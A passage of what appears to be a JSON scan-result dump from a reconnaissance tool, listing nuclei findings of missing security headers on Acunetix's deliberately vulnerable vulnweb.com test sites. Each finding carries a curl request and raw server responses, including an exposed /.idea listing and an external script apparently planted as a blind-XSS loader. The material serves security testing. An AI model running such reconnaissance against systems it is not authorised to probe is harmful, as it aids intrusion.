This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 393, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2' 'http://testphp.vulnweb.com/.idea/.name'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/.idea/.name", + "discovered_date": "2024-11-13T02:40:59.852Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.idea/.name HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 6\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nEtag: "4f911cd6-6"\r\nLast-Modified: Fri, 20 Apr 2012 08:22:46 GMT\r\nServer: nginx/1.19.0\r\n\r\nacuart", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 394, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46' 'http://testhtml5.vulnweb.com'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:40:59.990Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 395, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0' 'http://testphp.vulnweb.com/.idea'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/.idea", + "discovered_date": "2024-11-13T02:41:00.136Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.idea HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:51 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /.idea/</title></head>\r\n<body>\r\n<h1>Index of /.idea/</h1><hr><pre><a href="../">../</a>\r\n<a href="scopes/">scopes/</a> 13-Nov-2012 13:29 -\r\n<a href="acuart.iml">acuart.iml</a> 20-Apr-2012 08:22 292\r\n<a href="encodings.xml">encodings.xml</a> 20-Apr-2012 08:22 171\r\n<a href="misc.xml">misc.xml</a> 20-Apr-2012 08:22 266\r\n<a href="modules.xml">modules.xml</a> 20-Apr-2012 08:22 275\r\n<a href="vcs.xml">vcs.xml</a> 20-Apr-2012 08:22 173\r\n<a href="workspace.xml">workspace.xml</a> 20-Apr-2012 08:23 12473\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 396, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15' 'http://testhtml5.vulnweb.com/static/css'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/css", + "discovered_date": "2024-11-13T02:41:00.256Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/css HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>403 Forbidden</title></head>\r\n<body>\r\n<center><h1>403 Forbidden</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 397, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 76, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15' 'http://testaspnet.vulnweb.com'", + "type": "http", + "http_url": "http://testaspnet.vulnweb.com", + "discovered_date": "2024-11-13T02:41:00.383Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testaspnet.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 14069\r\nCache-Control: private\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASP.NET_SessionId=vmit32btaeasjnawkbexxh55; path=/; HttpOnly\r\nX-Aspnet-Version: 2.0.50727\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >\r\n<HTML>\r\n\t<HEAD>\r\n\t\t<title>acublog news</title>\r\n\t\t<META http-equiv="Content-Type" content="text/html; charset=windows-1252">\r\n\t\t<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">\r\n\t\t<meta content="C#" name="CODE_LANGUAGE">\r\n\t\t<meta content="JavaScript" name="vs_defaultClientScript">\r\n\t\t<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">\r\n\t\t<LINK href="styles.css" type="text/css" rel="stylesheet">\r\n\t</HEAD>\r\n\t<body>\r\n\t\t<form name="Form1" method="post" action="default.aspx" id="Form1">\r\n<div>\r\n<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />\r\n<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />\r\n<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />\r\n</div>\r\n\r\n<script type="text/javascript">\r\n//<![CDATA[\r\nvar theForm = document.forms['Form1'];\r\nif (!theForm) {\r\n theForm = document.Form1;\r\n}\r\nfunction __doPostBack(eventTarget, eventArgument) {\r\n if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\r\n theForm.__EVENTTARGET.value = eventTarget;\r\n theForm.__EVENTARGUMENT.value = eventArgument;\r\n theForm.submit();\r\n }\r\n}\r\n//]]>\r\n</script>\r\n\r\n\r\n<div>\r\n\r\n\t<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />\r\n\t<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig" />\r\n</div>\r\n\t\t\t\r\n<TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>\r\n\t\t<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"\r\n\t\t\theight="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>\r\n\t</TR>\r\n</TABLE>\r\n<TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>\r\n\t\t\t<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">\r\n\t\t\t\tsignup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>\r\n\t\t\t\t<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>\r\n\t\t</TD>\r\n\t\t<td class="MenuBar" align="right" width="50px">\r\n\t\t\t<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>\r\n\t\t</td>\r\n\t</TR>\r\n</TABLE>\r\n\r\n\t\t\t<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD id="tdPageData" valign="top">\r\n\t\t\t\t\t<DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">(37) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">(37) comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">(41) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>\r\n\r\n\t\t\t\t\t<TD vAlign="top" width="200">\r\n\t\t\t\t\t\t<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">\r\n\t<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">\r\n\t\t<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9040')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">November 2024</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9101')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>\r\n\t</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9066')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9067')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9068')" style="color:Black" title="October 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9069')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9070')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9071')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9072')" style="color:Black" title="November 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9073')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9074')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9075')" style="color:Black" title="November 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9076')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9077')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9078')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9079')" style="color:Black" title="November 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9080')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9081')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9082')" style="color:Black" title="November 12">12</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9083')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9084')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9085')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9086')" style="color:Black" title="November 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9087')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9088')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9089')" style="color:Black" title="November 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9090')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9091')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9092')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9093')" style="color:Black" title="November 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9094')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9095')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9096')" style="color:Black" title="November 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9097')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9098')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9099')" style="color:Black" title="November 